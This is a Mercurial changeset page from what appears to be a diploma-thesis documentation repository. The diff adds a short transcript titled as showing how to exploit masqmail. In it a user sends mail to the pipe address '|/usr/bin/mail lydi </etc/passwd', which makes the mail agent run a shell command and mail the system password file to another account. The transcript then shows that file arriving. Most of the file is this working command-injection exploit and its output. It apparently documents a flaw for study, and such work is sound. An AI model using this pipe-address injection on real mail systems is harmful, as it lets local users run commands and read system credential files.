Mercurial > docs > diploma

changeset 198:402db7e2ecc4

Find changesets by keywords (author, files, the commit message), revision number or hash, or revset expression.
how to exploit masqmail :-(
author meillo@marmaro.de
date Wed, 31 Dec 2008 14:04:35 +0100 (2008-12-31)
parents b08be036783d
children 8af18dd9103f
files hardcopies/bin-mail-attack.txt
diffstat 1 files changed, 33 insertions(+), 0 deletions(-) [+]
line wrap: on
line diff
--- /dev/null	Thu Jan 01 00:00:00 1970 +0000
+++ b/hardcopies/bin-mail-attack.txt	Wed Dec 31 14:04:35 2008 +0100
@@ -0,0 +1,33 @@
+test$ mail '|/usr/bin/mail lydi </etc/passwd'
+Subject: the password file
+hey hey jippee, here's your present :-)
+.
+Cc:
+test$
+
+
+
+
+lydi$ mail
+Mail version 8.1.2 01/15/2001.  Type ? for help.
+"/var/mail/lydi": 1 message 1 new
+>N  1 test@dream         Wed Dec 31 11:12   46/1910
+&
+Message 1:
+From <test@dream> Wed Dec 31 11:12:45 2008
+Envelope-to: <lydi@dream>
+To: lydi
+From: <test@dream>
+Date: Wed, 31 Dec 2008 11:12:45 +0100
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+.
+.
+.
+test:x:1001:1002:test,,,:/home/test:/bin/bash
+lydi:x:1002:1003:lydi,,,:/home/lydi:/bin/bash
+
+&